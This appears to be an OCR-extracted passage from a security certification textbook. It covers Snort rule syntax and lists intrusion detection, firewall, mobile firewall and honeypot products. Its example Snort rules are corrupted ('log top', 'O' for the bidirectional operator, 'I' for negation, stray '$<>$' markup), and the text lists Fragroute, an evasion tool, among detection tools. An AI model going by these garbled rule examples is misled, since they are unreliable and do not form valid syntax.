Snort rules, written for both protocol analysis and content searching and matching, should be robust and flexible. The rules should be "robust': the system should keep a hard check on the activities taking place on the network and notify the administrator of any potential intrusion attempt. The rules should be "flexible": the system must be compatible enough to act immediately and take necessary remedial measures, according to the nature of the intrusion.
Both flexibility and robustness can be achieved using an easy-to-understand and lightweight rule description language that aids in writing simple Snort rules. Consider two primary principles while writing Snort rules:
■ No written rule must extend beyond a single line, so rules should be short, precise, and easy-to-understand.
■ Each rule should be divided into two logical sections:
o The rule header o The rule options
The rule header contains the rule's action, the protocol, the source and destination IP addresses, the source and destination port information, and the CIDR (Classless Inter-Domain Routing) block. The rule option section includes alert messages, in addition to information about inspected part of the packet, to determine whether to take rule action.
Snort Rules: Rule Actions and IP Protocols
The rule header stores the complete set of rules to identify a packet, and determines the action to be performed or what rule to be applied. It contains information that defines the who, where, and what of a packet, as well as what to do if a packet with all the attributes indicated in the rule should show up. The first item in a rule is the rule action, which tells Snort "what to do" when it finds a packet that matches the rule criteria. There are five available default actions in Snort: alert, log, pass, activate, and dynamic. Also, if running Snort is running in inline mode, you have additional options, which include drop and reject.
IP supports unique addressing for every computer on a network. Organize data on the Internet protocol network into packets. Each packet contains message data, source, destination, and more.
Three available IP protocols that Snort supports for suspicious behavior:
■ TCP: Transmission control protocol (TCP) is a part of the Internet Protocol. It is used to connect two different hosts and exchanges data between them.
■ UDP: User Datagram Protocol (UDP) used for broadcasting messages over a network. ■ ICMP: The Internet Control Message protocol (ICMP) is a part of the Internet protocol.
OSs use ICMP in a network to send error messages, for example.
Snort Rules: The Direction Operator and IP Addresses
■ The Direction Operator
This operator indicates the direction of interest for the traffic; traffic can flow in either single direction or bi-directionally.
Example of a Snort rule using the Bidirectional Operator: log >192.168.1.0/24 any O 192.168.1.0/24 23
■ IP Addresses
o Identifies IP address and port that the rule applies to o Use keyword "any" to define IP address
o Use numeric IP addresses qualified with a CIDR netmask o Example IP Address Negation Rule:
Snort Rules: Port Numbers
Port numbers can be listed in different ways, including "any" ports, static port definitions, port ranges, and by negation. Port ranges are indicated by the range operator The direction operator "-$>$" indicates the orientation, or direction, of the traffic to which the rule applies. Consider an IP address and port number on the left side of the direction operator as the traffic coming from the source host, and the address and port information on the right side of the operator as the destination host. There is also a bidirectional operator, indicated with a "$<>$" operator. This tells Snort to consider the address/port pairs in either the source or the destination orientation and is handy for recording/analyzing both sides of a conversation, such as telnet or POP3 sessions. Also, note that there is no "$<$-" operator. In Snort versions before 1.8.7, the direction operator did not have proper error checking, so many people used an invalid token. The reason the "$<$-" does not exist is so that rules always read consistently.
The next fields in a Snort rule specify the source and destination IP addresses and ports of the packet, as well as the direction in which the packet is traveling. Snort can accept a single IP address or a list of addresses. When specifying a list of IP address, you should separate each one with a comma and then enclose the list within square brackets, like this:
[192.168.1.1,192.168.1.45,10.1.1.241
When doing this, be careful not to use any whitespace. You can also specify ranges of IPaddresses using CIDR notation, or even include CIDR ranges within lists. Snort also allows you to apply the logical NOT operator ("I") to an IP address or CIDR range to specify that the rule should match all but that address or range of addresses. For example, an easy modification to the initial example is to make it alert on any traffic that originates outside of the local net with the negation operator. Example of a Port Negation:
log top any any -> 192.168.1.0/24 *6000:6010
Intrusion Detection Tools
■ TippingPoint
Source: https://tmc.tippingpoint.com
TippingPoint IPS is in-line threat protection that defends critical data and applications without affecting performance and productivity. It contains over 8,700 security filters written to address zero-day and known vulnerabilities. TippingPoint IPS consists of both inbound/outbound traffic inspection, as well as application-level security capabilities.
Features:
o Pre-built, real-time reports that display big-picture analyses on traffic, top applications, and filtered attack events
o Permits to see, control, and leverage the rules, shared services, and profiles of all the firewall devices throughout the network
o Comprises of in-line, bump-in-the-wire intrusion prevention system with layer two fallback capabilities
o Gives an overview of current performance for all HP systems in the network, including launch capabilities into targeted management applications by using monitors
o Delivers fully customizable dashboard and management console
o Offers up to 20 GB of protection with less than 40 microseconds of network latency
■ AlienVault® OSSIM™
Source: https://www.alienvault.co
AlienVault® OSSIM™, Open Source Security Information and Event Management (SIEM), provides you with a feature-rich open source SIEM complete with event collection, normalization, and correlation. OSSIM provides one unified platform with many of the essential security capabilities like:
o Asset discovery
o Vulnerability assessment o Intrusion detection
o Behavioral monitoring o SIEM event correlation
Intrusion Detection Tools
Listed below are some of the additional intrusion detection tools:
■ Check Point IPS Software Blade (https://www.checkpoint.com)
■ IBM Security Network Intrusion Prevention System (https://www.ibm.com)
■ AlienVault Unified Security Management (https://www.alienvault.com)
■ Cyberoam Intrusion Prevention System (https://www.cyberoam.com)
■ McAfee Host Intrusion Prevention for Desktops (https://www.mcafee.com)
■ Next-Generation Intrusion Prevention System (NGIPS) (https://www.cisco.com)
■ FortiGate IPS (https://www.fortinet.com)
■ Next Generation Threat Prevention (https://www.checkpoint.com)
■ Suricata (https://suricata-ids.org)
■ Snare (https://www.intersectalliance.com)
■ OSSEC (https://ossec.github.io)
■ Cisco Intrusion Prevention Systems (https://www.cisco.com)
■ AIDE (Advanced Intrusion Detection Environment) (http://aide.sourceforge.net)
■ Vangaurd Enforcer (https://www.go2vanguard.com)
■ INTOUCH INSA-Network Security Agent (http://www.ttinet.com)
■ Fragroute (https://www.monkey.org)
■ Peek & Spy (http://networkingdynamics.com)
■ IDP8200 Intrusion Detection and Prevention Appliances (https://www.juniper.net)
Intrusion Detection Tools for Mobile
There are also Intrusion detection tools available for mobile devices that can help you detect and prevent any attempt of intrusion.
■ ZIPS
Source: https://www.zimperium. com
Zimperium's ZIPS’* is a mobile intrusion prevention system app that provides comprehensive protection for iOS and Android devices against mobile network, device and application cyber attacks. It can detect both known and unknown threats by analyzing the behavior of your mobile device. By examining slight deviations to the mobile device's OS statistics, memory, CPU and other system parameters, z9’* detection engine can accurately identify not only the specific type of malicious attack, but also the forensics associated with the who, what, where, when, and how of an attack occurrence.
• Wifi Inspector
Source: https://play.google.com
Wifi Inspector allows you to find all the devices connected to the network (both wired and Wi-Fi, whether consoles, TVs, pcs, tablets, phones, etc.), giving relevant data such as IP address, manufacturer, device name and Mac Address. It also allows saving a list of known devices with custom name and finds intruders in a short period.
■ Wifi Intruder Detector pro
Source: https://play.google.com
Wifi Intruder Detector pro helps to find security leaks in the Wi-Fi network internet connection. It allows to detectan intruder who is accessing the network, Wi-Fi, or Internet connection without your consent.
Firewalls
Firewalls provide essential protection to the computers against viruses, privacy threats, objectionable content, hackers, and malicious software when connected to the Internet. A firewall monitors are running applications that access the network. It analyzes downloads and warns if downloading a malicious file, stops it from infecting a PC.
■ ZoneAlarm PRO FIREWALL 2018
Source: https://www.zonealarm.com
ZoneAlarm PRO Firewall blocks attackers and intruders from accessing your system. It monitors programs for suspicious behavior spotting and stopping new attacks that bypass traditional anti-virus protection. It prevents identity theft by guarding your data. It even erases your tracks allowing you to surf the web in complete privacy. Furthermore, it locks out attackers, blocks intrusions, and makes your PC invisible online. Also, it filters out an annoying and potentially dangerous email.
Features:
o Two-way firewall that monitors and blocks inbound as well as outbound traffic o Allows users to browse the web privately
o Identity protection services help to prevent identity theft by guarding crucial data of the users. It also offers PC protection and data encryption
o Through Do Not Track, it stops data-collecting companies from tracking the online
users
o Online Backup to backs up files and restores the data in the event of loss, theft, accidental deletion or disk failure
■ Firewall Analyzer
Source: https://www.manageengine.com
Firewall Analyzer, an agent-less log analytics and configuration management software that helps network administrators to understand how bandwidth is being used in their network. Firewall Analyzer is vendor-agnostic and supports almost all open source and commercial network firewalls such as Check Point, Cisco, Juniper, Fortinet, Palo Alto, etc.
Features:
o Compliance Management
o Change Management
o User Internet Activity Monitoring
o Network Traffic and Bandwidth Monitoring
o Firewall Policy Management
o Real-time VPN and Proxy Server Monitoring
o Network Security Management
o Network Forensic Audits
o Log Analysis
■ Comodo Firewall (https://personalfirewall.comodo.com)
■ Sophos XG Firewall (https://www.sophos.com)
■ Check Point Firewall Software Blade (https://www.checkpoint.com)
■ eScan Enterprise Edition (https://www.escanav.com)
■ Untangle NG Firewall (https://www.untangle.com)
■ Glasswire (https://www.glasswire.com)
■ Zscaler Cloud Firewall (https://www.zscaler.com)
■ TinyWall (https://tinywall.pados.hu)
■ Cisco ASA (https://www.cisco.com)
■ Meraki Cisco Firewall (https://meraki.cisco.com)
■ Sonicwall NEXT GENERATION FIREWALLS (https://www.sonicwall.com)
■ FortiGate Next-Generation Firewall (https://www.fortinet.com)
■ Jetico Personal Firewall (http://www.jetico.com)
■ Palo Alto Network Wildfire (https://www.paloaltonetworks.com)
■ PeerBlock (http://forums.peerblock.com)
Firewalls for Mobile
The firewalls discussed previously used for securing personal computers and networks. Likewise, some firewalls can secure mobile device.
■ Mobiwol: No Root Firewall
Source: http://www.mobiwol.com
Mobiwol No Root Firewall helps in taking control of mobile apps, easily allow/block app connectivity, and block background app activity. It generates alerts when new apps access the Internet.
Features:
o Automatic launch on device startup
o Automatically identifies applications currently installed on your mobile device o Identifies and notifies when newly installed apps access the Web
o Set Allow/Block, on a per-application basis o Disable background activity for selected apps
■ Mobile Privacy Shield
Source: https://shieldapps.com
Mobile Privacy Shield is an application for people on the move. People that store necessary information on their smartphones and use their devices for banking, shopping, business, and more. Mobile Privacy Shield's Privacy Advisor monitors applications permissions, sorting them into three categories by privacy-risk level. Each report is packed with detailed information and a suggested response per case. Mobile Privacy Shield
centralizes all permissions allowing you to review and assess their validity and need conveniently. It also allows to remove each threat from within the interface.
■ Net Patch Firewall
Source: https://firewall.netpatch.co
NetPatch Firewall is one full-featured advanced android noroot firewall. It can be used to fully control over mobile device network. With NetPatch Firewall, you can create network rules based on APP, IP address, and domain name, etc. This Firewall is designed to save mobile device's network traffic and battery consumption, improve network security and protect privacy.
Features:
o Block network access per apps, based screen on/off, wifi/mobile (3G & 4G), and block Roaming
o Shadowsocks secure proxy, support TCP and UDP (one better VPN proxy)
o Custom DNS, change your DNS servers, support DNS query through Shadowsocks proxy, and set DNS cache time
o Notify when new apps installed o Export/import configure
Listed below are some of the additional firewalls for mobile devices:
■ Firewall Gold (https://play.google.com)
■ AFWall+ (https://github.com)
■ DroidWall - Android Firewall (https://play.google.com)
■ aFirewall (https://afirewall.wordpress.com)
■ Root Firewall (http://www.rootuninstaller.com)
■ NoRoot Firewall (https://play.google.com)
■ NoRoot Data Firewall (https://play.google.com)
■ Kronos Firewall (https://play.google.com)
■ VPN Safe Firewall (https://play.google.com)
■ Privacy Firewall (https://play.google.com)
■ NetGuard (https://www.netguard.me)
■ Bluetooth Firewall (https://play.google.com)
■ CIA Firewall (https://play.google.com)
■ Ultra Firewall (https://play.google.com)
■ Firewall iP (http://cydia.saurik.com)
Honeypot Tools
Honeypots are the security tools that give the security community an opportunity to monitor attackers' tricks and exploits by logging their every activity so that they can respond to these exploits quickly without attacker's misusing and compromising systems.
■ KFSensor
Source: http://www.keyfocus.net
KFSensor is a host-based Intrusion Detection System (IDS) that acts as a honeypot to attract and detect hackers and worms by simulating vulnerable system services and Trojans. By acting as a decoy server, it can divert attacks from critical systems and provide a higher level of information that can be achieved by using firewalls and NIDS alone.
You can use KFSensor in a Windows-based corporate environment and contains many innovative and unique features such as remote management, a Snort-compatible signature engine, and emulations of Windows networking protocols.
Features:
o Signature attack identification
o Detects Wi ndows networki ng attacks
o Remote Administration
o Identifies unknown threats
o Security in-depth
o Real-time detection
o Advanced server simulation
o Extendable architecture
o No false positives and low overhead
■ SPECTER
Source: http://www.specter.com
SPECTER is a honeypot or deception system. It simulates a complete system and provides an appealing target to lure hackers away from production systems. It offers typical Internet services such as SMTP, FTP, POP3, HTTP, and TELNET, which appear perfectly normal to attackers. However, it is a trap for an attacker by messing them so that he leaves some traces knowing that they had connected to a decoy system that does none of the things it appears to do; but instead, it logs everything and notifies the appropriate people.
Furthermore, SPECTER automatically investigates attackers while they are still trying to break in. It provides massive amounts of decoy content, and it generates decoy programs that cannot leave hidden marks on the attacker's computer. Automated weekly online updates of the honeypot's content and vulnerability databases allow the honeypot to change regularly without user interaction.